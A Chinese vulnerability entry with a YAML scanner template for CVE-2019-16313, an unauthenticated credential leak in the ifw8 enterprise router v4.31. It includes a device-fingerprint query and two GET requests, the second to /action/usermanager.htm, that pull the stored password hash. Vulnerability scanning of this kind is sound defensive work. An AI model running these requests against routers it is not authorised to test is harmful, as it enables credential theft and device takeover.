漏洞描述
蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器
app="蜂网互联-互联企业级路由器"
id: CVE-2019-16313
info:
name: ifw8 Router ROM v4.31 Credential Discovery
author: cc_ci(https://github.com/cc8ci)
severity: high
description: |
蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器
app="蜂网互联-互联企业级路由器"
reference:
- http://wiki.peiqi.tech/wiki/iot/%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94/%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%20%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%20%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E%20CVE-2019-16313.html
rules:
r0:
request:
method: GET
path: /index.htm?PAGE=web
expression: response.status == 200 && response.body.bcontains(b"www.ifw8.cn")
r1:
request:
method: GET
path: /action/usermanager.htm
expression: response.status == 200 && "\"pwd\":\"[0-9a-z]{32}\"".bmatches(response.body)
expression: r0() && r1()